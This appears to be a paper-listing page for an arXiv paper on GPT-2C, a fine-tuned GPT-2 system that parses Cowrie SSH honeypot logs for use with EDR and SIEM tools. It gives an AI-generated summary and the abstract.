CRSep 14, 2021

GPT-2C: A GPT-2 parser for Cowrie honeypot logs

arXiv:2109.06595v2
AI Analysis

This addresses interoperability issues between honeypots and security technologies like EDR/SIEM for cybersecurity practitioners, but is incremental as it applies an existing method to a new domain.

The paper tackles the problem of parsing dynamic log topics from Cowrie SSH honeypot logs by developing GPT-2C, a system that fine-tunes GPT-2 for this task, achieving 89% inference accuracy with acceptable latency.

Deception technologies like honeypots produce comprehensive log reports, but often lack interoperability with EDR and SIEM technologies. A key bottleneck is that existing information transformation plugins perform well on static logs (e.g. geolocation), but face limitations when it comes to parsing dynamic log topics (e.g. user-generated content). In this paper, we present a run-time system (GPT-2C) that leverages large pre-trained models (GPT-2) to parse dynamic logs generate by a Cowrie SSH honeypot. Our fine-tuned model achieves 89\% inference accuracy in the new domain and demonstrates acceptable execution latency.

Foundations

The foundational work for this paper's niche, ranked by how specifically the neighbourhood builds on it — not by global fame.

Your Notes